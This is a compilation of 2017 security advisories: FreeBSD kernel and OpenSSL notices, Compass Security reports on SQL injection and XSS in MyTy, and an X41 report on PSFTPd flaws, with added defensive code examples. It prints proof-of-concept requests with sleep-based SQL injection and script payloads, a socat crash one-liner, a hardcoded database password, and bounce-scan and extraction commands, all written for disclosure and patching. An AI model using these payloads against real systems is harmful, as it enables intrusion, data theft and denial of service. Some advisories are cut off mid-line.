in exponentiation with 1024-bit moduli. This only affects processors that
support the AVX2 but not ADX extensions like Intel Haswell (4th generation).
[CVE-2017-3738] This bug only affects FreeBSD 11.x.

III. Impact

Applications with incorrect error handling may inappropriately pass unencrypted
data. [CVE-2017-3737]

Mishandling of carry propagation will produce incorrect output, and make it
easier for a remote attacker to obtain sensitive private-key information. No
EC algorithms are affected and analysis suggests that attacks against RSA and
DSA as a result of this defect would be very difficult to perform and are not
believed likely. Attacks against DH1024 are considered just feasible (although
very difficult) because most of the work necessary to deduce information about
a private key may be performed offline. The amount of resources required for
such an attack would be very significant and likely only accessible to a
limited number of attackers. However, for an attack on TLS to be meaningful,
the server would have to share the DH1024 private key among multiple clients,
which is no longer an option since CVE-2016-0701. [CVE-2017-3738]

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date. Restart all
daemons that use the library, or reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can
be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Restart all daemons that use the library, or reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the detached
PGP signature using your PGP utility.

[FreeBSD 10.x]
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-10.patch
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-10.patch.asc
# gpg --verify openssl-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-11.patch
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-11.patch.asc
# gpg --verify openssl-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected
branch.

Branch/path                                                         Revision
- -------------------------------------------------------------------------
stable/10/                                                          r326
CSNC-2017-029 MyTy Blind SQL Injection
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-029
# CVE ID:   -
# Subject:  Blind SQL injection
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heini...@compass-security.com>
# Date:     21.11.2017
#

Introduction:
-------------
MyTy [1] is a software framework that includes a crowdfunding module. It can be
installed on a customer server and used to create whitelabel websites for
crowdfunding platforms.

Compass Security discovered a web application security flaw in the
crowdfunding module login process that allows an unauthenticated attacker to
execute arbitrary SQL queries against the database. This allows reading and
modifying the whole database, within the privilege limitations of the database
user executing the queries.

Affected:
---------
Vulnerable:
 * MyTy 5.0.4 to 5.1.6

Technical Description:
----------------------
During the login process, the user email and password are sent in a POST
request. In this request, the login_email parameter is concatenated into an
SQL query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following
request:

===
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1 =simpleLogin=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D; lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1===%252Fprojekte%252Fsuchergebnisse.html%253F _type=inline=1=simpleLogin _email=test'%2b(select*from(select(sleep(20)))a)%2b'_password=1234
===

Workaround / Fix:
-----------------
Install an up to date version of the MyTy software.

As a developer: Strictly use prepared statements in order to protect the
application from SQL injection.

Optional addition: Validate all user input and filter dangerous characters,
which can cause a change of the context and have to be filtered, cut or
escaped, e.g. " ' -- () ;

Timeline:
---------
2017-11-21: Coordinated public disclosure date
2017-09-06: Release of fix in versions 5.0.12 and 5.1.7
2017-09-06: Initial vendor response
2017-09-06: Initial vendor notification
2017-09-06: Discovery by Nicolas Heiniger

References:
-----------
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap
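The fix the advisory recommends is the prepared statement. The pair of lookups below is an added example, not MyTy code: sqlite3 stands in for the product's database and the users table is assumed, but the flaw is the same one reported, login_email spliced into the SQL text, shown beside the bound-parameter form. A legitimate address containing an apostrophe is enough to tell the two apart: the concatenated query breaks on it, the prepared one treats it as data.

```python
"""login_email lookup: string concatenation beside a prepared statement.

Added example, not MyTy code. sqlite3 stands in for the product's database;
the users table and its contents are constructed for the example.
"""
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[int, str]


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account (hash is a placeholder)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users (email, pw_hash) VALUES (?, ?)",
                 ("alice@example.com", "<hash-placeholder>"))
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, login_email: str) -> List[Row]:
    """Mirrors the reported flaw: the parameter becomes part of the SQL text,
    so quote characters in it change the query rather than the value."""
    sql = "SELECT id, email FROM users WHERE email = '" + login_email + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, login_email: str) -> List[Row]:
    """Prepared statement: the value is bound by the driver and never parsed as SQL."""
    return conn.execute("SELECT id, email FROM users WHERE email = ?",
                        (login_email,)).fetchall()


def lookup_survives_apostrophe(conn: sqlite3.Connection,
                               lookup: Callable[[sqlite3.Connection, str], List[Row]]) -> bool:
    """True if the lookup handles an address with an apostrophe without a SQL error.
    The concatenated form fails here because the apostrophe closes the literal."""
    try:
        lookup(conn, "o'brien@example.com")
        return True
    except sqlite3.Error:
        return False


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", vulnerable_lookup), ("prepared", safe_lookup)):
        print(name, "handles o'brien@example.com:", lookup_survives_apostrophe(db, fn))
```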
CSNC-2017-030 MyTy Reflected Cross-Site Scripting (XSS)
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: MyTy # Vendor: Finlane GmbH # CSNC ID: CSNC-2017-030 # CVE ID: - # Subject: Reflected Cross-Site Scripting (XSS) # Risk: High # Effect: Remotely exploitable # Author: Nicolas Heiniger <nicolas.heini...@compass-security.com> # Date: 21.11.2017 # # Introduction: - MyTy[1] is a software framework that includes a crowdfunding module. It can be installed on a customer server and used to create whitelabel websites for crowdfunding platforms. Compass Security discovered a web application security flaw in the login page of the administration web console that allows an unauthenticated attacker to execute JavaScript code in the browser of a legitimate user. This allows, for instance, to redirect the user to a phishing page and gather credentials. Affected: - Vulnerable: * MyTy 5.1.0 to 5.1.7 Technical Description - In the login page of the administration console, a tyLang parameter is passed together with the user and the password in the login request. This parameter is then included unencoded in the HTTP response. 
The login request for a proof of concept is as follows:

===
POST /tycon/index.php HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: [CUT BY COMPASS]
Cookie: tyFl=de_de; XSRF-TOKEN=ZNc%2FZRg4sCgXP0g3IZZ8QxsO7caLshyKp7u75yiyW5o%3D; lang=de; PHPSESSID=b4pcsacfvpv716e3l825cqbuo3; tyBl=en_us; cfce=1; _ga=GA1.2.75537659.1504612703; cf_cookie_policy_read=1; _gid=GA1.2.1498092563.1504761922
CSNC-HEN: Pentest1-Blue
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

view=default==de"alert(1) _user_id=0_user_hash==admin=123456
===

The HTTP response shows that the payload is returned unencoded in the HTML page:

===
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 07 Sep 2017 06:52:05 GMT
Content-Type: text/html; charset=utf-8
[CUT BY COMPASS]
myty-Login | myty 5.1.7/2017-09-06
var myty = {
    version: '5.1.7',
    revision: 5001007,
    backend: {
        basepath: '/tycon',
        language: 'de"alert(1)',
        themepath: '/tycon/themes/spring'
    },
[CUT BY COMPASS]
===

Workaround / Fix:
-----------------
- Install an up to date version of the MyTy software.

As a developer:
This issue can be fixed by properly encoding dangerous characters in the output according to the encoding rules of the respective type of context (HTML body, argument, JS string, generated URLs). For normal HTML body content, the following HTML entities can be used:

  <  ->  &lt;
  >  ->  &gt;
  "  ->  &quot;
  '  ->  &#x27;
  &  ->  &amp;

Timeline:
---------
2017-11-21: Coordinated public disclosure date
2017-09-08: Release of fix in version 5.1.8
2017-09-08: Initial vendor response
2017-09-07: Initial vendor notification
2017-09-07: Discovery by Nicolas Heiniger

References:
-----------
[1] https://www.finlane.com/loesungen/whitelabel-pages/
FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat [REVISED]
=============================================================================
FreeBSD-SA-17:10.kldstat                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Information leak in kldstat(2)

Category:       core
Module:         kernel
Announced:      2017-11-15
Credits:        Ilja van Sprundel
                TJ Corley
Affects:        All supported versions of FreeBSD.
Corrected:      2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE)
                2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4)
                2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15)
                2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE)
                2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3)
                2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:       CVE-2017-1088

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2017-11-15  Initial release.
v1.1  2017-11-20  Corrected credit. Ilja van Sprundel first reported the issue to the project, but wasn't cited. The FreeBSD Security Team apologizes to Ilja for this oversight.

I.   Background

The kldstat(2) syscall provides information about loaded kld files. The syscall takes a userland argument of struct kld_file_stat which is then filled with data about the kld file requested.

II.  Problem Description

The kernel does not properly clear the memory of the kld_file_stat structure before filling the data. Since the structure filled by the kernel is allocated on the kernel stack and copied to userspace, a leak of information from the kernel stack is possible.

III. Impact

Some bytes from the kernel stack can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch
# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc
# gpg --verify kldstat.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r325867
releng/10.3/                                                      r325878
releng/10.4/                                                      r325877
stable/11/                                                        r325866
releng/11.0/                                                      r325876
releng/11.1/                                                      r325875
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1088>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:10.kldstat.asc>
FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat
=============================================================================
FreeBSD-SA-17:10.kldstat                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Information leak in kldstat(2)

Category:       core
Module:         kernel
Announced:      2017-11-15
Credits:        TJ Corley
Affects:        All supported versions of FreeBSD.
Corrected:      2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE)
                2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4)
                2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15)
                2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE)
                2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3)
                2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:       CVE-2017-1088

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The kldstat(2) syscall provides information about loaded kld files. The syscall takes a userland argument of struct kld_file_stat which is then filled with data about the kld file requested.

II.  Problem Description

The kernel does not properly clear the memory of the kld_file_stat structure before filling the data. Since the structure filled by the kernel is allocated on the kernel stack and copied to userspace, a leak of information from the kernel stack is possible.

III. Impact

Some bytes from the kernel stack can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch
# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc
# gpg --verify kldstat.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r325867
releng/10.3/                                                      r325878
releng/10.4/                                                      r325877
stable/11/                                                        r325866
releng/11.0/                                                      r325876
releng/11.1/                                                      r325875
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1088>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:10.kldstat.asc>
FreeBSD Security Advisory FreeBSD-SA-17:09.shm
=============================================================================
FreeBSD-SA-17:09.shm                                        Security Advisory
                                                          The FreeBSD Project

Topic:          POSIX shm allows jails to access global namespace

Category:       core
Module:         shm
Announced:      2017-11-15
Credits:        Whitewinterwolf
Affects:        FreeBSD 10.x
Corrected:      2017-11-13 23:21:17 UTC (stable/10, 10.4-STABLE)
                2017-11-15 22:45:50 UTC (releng/10.4, 10.4-RELEASE-p3)
                2017-11-15 22:45:13 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:       CVE-2017-1087

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

POSIX shared memory objects allow realtime inter-process communication by sharing a memory area through the use of a named path (see shm_open(2)). This is used by some multi-process applications to share data between running processes, such as a common cache, or to implement a producer-consumer model where several worker processes handle requests pushed by a producer process.

II.  Problem Description

Named paths are globally scoped, meaning a process located in one jail can read and modify the content of POSIX shared memory objects created by a process in another jail or the host system.

III. Impact

A malicious user that has access to a jailed system is able to abuse shared memory by injecting malicious content into the shared memory region. This memory region might be executed by applications trusting the shared memory, like Squid. This issue could lead to a Denial of Service or local privilege escalation.

IV.  Workaround

No workaround is available, but systems without jails or jails not having local users are not vulnerable.

V.   Solution

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

Reboot the system for the update to take effect.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Reboot the system for the update to take effect.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 10.4, FreeBSD 10-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.patch
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.patch.asc
# gpg --verify shm-10.patch.asc

[FreeBSD 10.3]
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.3.patch
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.3.patch.asc
# gpg --verify shm-10.3.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r325783
releng/10.3/                                                      r325873
releng/10.4/                                                      r325874
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1087>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:09.shm.asc>
FreeBSD Security Advisory FreeBSD-SA-17:08.ptrace
=============================================================================
FreeBSD-SA-17:08.ptrace                                     Security Advisory
                                                          The FreeBSD Project

Topic:          Kernel data leak via ptrace(PT_LWPINFO)

Category:       core
Module:         ptrace
Announced:      2017-11-15
Credits:        John Baldwin
Affects:        All supported versions of FreeBSD.
Corrected:      2017-11-10 12:28:43 UTC (stable/11, 11.1-STABLE)
                2017-11-15 22:39:41 UTC (releng/11.1, 11.1-RELEASE-p4)
                2017-11-15 22:40:15 UTC (releng/11.0, 11.0-RELEASE-p15)
                2017-11-10 12:31:58 UTC (stable/10, 10.4-STABLE)
                2017-11-15 22:40:32 UTC (releng/10.4, 10.4-RELEASE-p3)
                2017-11-15 22:40:46 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:       CVE-2017-1086

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The ptrace(2) syscall provides the facility for a debugger to control the execution of the target process and to obtain necessary status information about it. The struct ptrace_lwpinfo structure is reported by one of the ptrace(2) subcommands and contains a lot of the information about the stopped thread (light-weight process or LWP, thus the name).

II.  Problem Description

Not all information in the struct ptrace_lwpinfo is relevant for the state of any thread, and the kernel does not fill the irrelevant bytes or short strings. Since the structure filled by the kernel is allocated on the kernel stack and copied to userspace, a leak of information from the kernel stack of the thread is possible from the debugger.

III. Impact

Some bytes from the kernel stack of the thread using the ptrace(PT_LWPINFO) call can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:08/ptrace.patch
# fetch https://security.FreeBSD.org/patches/SA-17:08/ptrace.patch.asc
# gpg --verify ptrace.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r325643
releng/10.3/                                                      r325871
releng/10.4/                                                      r325870
stable/11/                                                        r325642
releng/11.0/                                                      r325869
releng/11.1/                                                      r325868
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1086>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:08.ptrace.asc>
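The kldstat(2) and ptrace(PT_LWPINFO) advisories above describe the same bug class: a structure built on the kernel stack is copied to userspace without first being cleared. The C program below is an added example, not FreeBSD code; it models that stack region as a byte arena (the struct layout, the stale-byte marker and the leaked_bytes() helper are constructed for the example) and shows the vulnerable pattern beside the fix the advisories' patches apply, which is clearing the whole struct before filling it.

```c
/*
 * Added example (not FreeBSD code): user-space model of the bug class in
 * SA-17:10 (kldstat) and SA-17:08 (ptrace). A struct built on the kernel
 * stack is copied to userspace without being cleared first, so bytes left
 * there by earlier kernel work travel with it. Everything here is constructed.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 32
#define KSTACK_SIZE  256
#define STALE_BYTE   0xAA   /* stands in for leftover kernel data */

/* Hypothetical record in the spirit of kld_file_stat: a short string plus
 * scalars, with compiler padding after the 16-bit field. */
struct file_stat {
    char     name[NAME_MAX_LEN];
    uint16_t version;
    uint64_t address;
    size_t   size;
};

/* The kernel stack region where the syscall handler's local lives; the
 * union keeps the struct correctly aligned inside the byte arena. */
union kstack {
    unsigned char    bytes[KSTACK_SIZE];
    struct file_stat st;
};

/* Some earlier kernel activity left data in this stack region. */
static void earlier_kernel_work(union kstack *ks)
{
    memset(ks->bytes, STALE_BYTE, sizeof ks->bytes);
}

/* Fill only the requested fields. The unused tail of name[] and the padding
 * are never written: exactly the gap the advisories describe. */
static void fill_fields(struct file_stat *st, const char *name,
                        uint64_t address, size_t size)
{
    size_t n = strlen(name);
    if (n > NAME_MAX_LEN - 1)
        n = NAME_MAX_LEN - 1;
    memcpy(st->name, name, n);
    st->name[n] = '\0';
    st->version = 1;
    st->address = address;
    st->size    = size;
}

/* Vulnerable pattern: the local struct is used as-is, then copied out. */
static void sys_stat_leaky(union kstack *ks, struct file_stat *user_out,
                           const char *name, uint64_t address, size_t size)
{
    struct file_stat *st = &ks->st;          /* uninitialised local */
    fill_fields(st, name, address, size);
    memcpy(user_out, st, sizeof *st);        /* stands in for copyout(9) */
}

/* Fixed pattern: clear the whole struct before filling it. */
static void sys_stat_fixed(union kstack *ks, struct file_stat *user_out,
                           const char *name, uint64_t address, size_t size)
{
    struct file_stat *st = &ks->st;
    memset(st, 0, sizeof *st);               /* the fix: bzero() first */
    fill_fields(st, name, address, size);
    memcpy(user_out, st, sizeof *st);
}

/* Count bytes in the userspace copy that still carry the stale marker. */
static size_t count_stale_bytes(const struct file_stat *u)
{
    const unsigned char *p = (const unsigned char *)u;
    size_t n = 0;
    for (size_t i = 0; i < sizeof *u; i++)
        if (p[i] == STALE_BYTE)
            n++;
    return n;
}

/* Run one "syscall" against a dirtied stack and report how many stale bytes
 * reached userspace: at least the 23 unused bytes of name[] (plus padding)
 * for the vulnerable variant, none for the fixed one. */
size_t leaked_bytes(int fixed)
{
    union kstack ks;
    struct file_stat user;
    earlier_kernel_work(&ks);
    if (fixed)
        sys_stat_fixed(&ks, &user, "if_em.ko", 0xffffffff81000000ULL, 4096);
    else
        sys_stat_leaky(&ks, &user, "if_em.ko", 0xffffffff81000000ULL, 4096);
    return count_stale_bytes(&user);
}

int main(void)
{
    printf("stale bytes copied out, vulnerable: %zu\n", leaked_bytes(0));
    printf("stale bytes copied out, fixed:      %zu\n", leaked_bytes(1));
    return 0;
}
```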
Advisory X41-2017-006: Multiple Vulnerabilities in PSFTPd Windows FTP Server
X41 D-Sec GmbH Security Advisory: X41-2017-006

Multiple Vulnerabilities in PSFTPd Windows FTP Server
=====================================================

Overview
--------
Confirmed Affected Versions: 10.0.4 Build 729
Confirmed Patched Versions: None
Vendor: Sergei Pleis Softwareentwicklung
Vendor URL: http://www.psftp.de/ftp-server/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/

Summary and Impact
------------------
Several issues have been identified which allow attackers to hide information in log files, recover passwords and crash the whole server. The server uses neither ASLR nor DEP to make exploitation harder.

Product Description
-------------------
From the vendor page, roughly translated: PSFTPd is a user-friendly, functional and robust FTP server software with support for FTP, FTPS and SFTP.

Use after free
==============
Severity Rating: High
Vector: Network
CVE: CVE-2017-15271
CWE: 416
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary and Impact
------------------
An invalid memory access issue could be triggered remotely in the SFTP component of PSFTPd. This issue could be triggered prior to authentication. The PSFTPd server did not automatically restart, which enabled attackers to perform a very effective DoS attack against this service.

By sending the following SSH identification / version string to the server, a NULL pointer dereference could be triggered:

$ cat tmp.14
SSH-2.0-
$ cat tmp.14 | socat - TCP:192.168.122.50:22

The issue appears to be a race condition in the window message handling that performs the cleanup for invalid connections. Upon further investigation X41 D-Sec GmbH could confirm that the accessed memory was already freed. X41 D-Sec GmbH enabled the memory debugging functionality page heap for the psftpd_svc.exe executable using the command "gflags.exe /p /disable psftpd_svc.exe /full". When observing the crash in the WinDBG 19 debugging tool, it could be confirmed that access to an already freed page was taking place.

Log Injection
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15270
CWE: 117
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Summary and Impact
------------------
The PSFTPd server does not properly escape data before writing it into a Comma Separated Values (CSV) file. This can be used by attackers to hide data in the Graphical User Interface (GUI) view and, to a certain extent, create arbitrary entries. Special characters such as '"', ',' and '\r' are not escaped and can be used to add new entries to the log.

Workarounds
-----------
None

Passwords stored in Plain Text
==============================
Severity Rating: Low
Vector: Local
CVE: CVE-2017-15272
CWE: 312
CVSS Score: 3.3
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
The PSFTPd server stores its configuration inside the file PSFTPd.dat. This file is a Microsoft Access database and can be extracted by using the command "mdb-export PSFTPd.dat USERS" from mdbtools (https://github.com/brianb/mdbtools). The application sets the encrypt flag with the password "ITsILLEGAL", but this is not required to extract the data. The user's password is shown in clear text, since it is not stored securely.

Workarounds
-----------
Use the Active Directory connector for your users.

FTP Bounce Scan
===============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15269
CWE: 441
CVSS Score: 5.0
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Summary and Impact
------------------
The PSFTPd server does not prevent FTP bounce scans by default. These can be performed using "nmap -b" and allow scans to be carried out via the FTP server.

Workarounds
-----------
It is possible to prevent FTP bounce scans by setting:
Kontrollmanager > Domain > Sicherheit > Register "FTP Bounce and FXP"

Workarounds
-----------
None

About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions.

Timeline
--------
2017-08-31 Issues found
2017-09-18 Vendor contacted
2017-09-19 Vendor reply
2017-10-11 CVE IDs requested
2017-10-11 CVE IDs assigned
2017-11-06 Vendor informed us that apparently a fixed version was released. We cannot confirm this, since we do not have access.
2017-11-07 Public release

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier
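For the CSV log injection above (CVE-2017-15270), the defensive counterpart is quoting every externally supplied field before it is written. The C code below is an added example, not PSFTPd code: csv_quote_field() applies the usual CSV quoting rules (wrap a field containing a separator, quote or line break in double quotes and double any embedded quote), and the sample log fields are constructed to show that a quote-aware reader then sees one record where raw concatenation produced two.

```c
/*
 * Added example (not PSFTPd code): CSV quoting for log fields so that a
 * client-controlled value cannot open a new record or column (CWE-117).
 * Rules: wrap a field containing a comma, double quote, CR or LF in double
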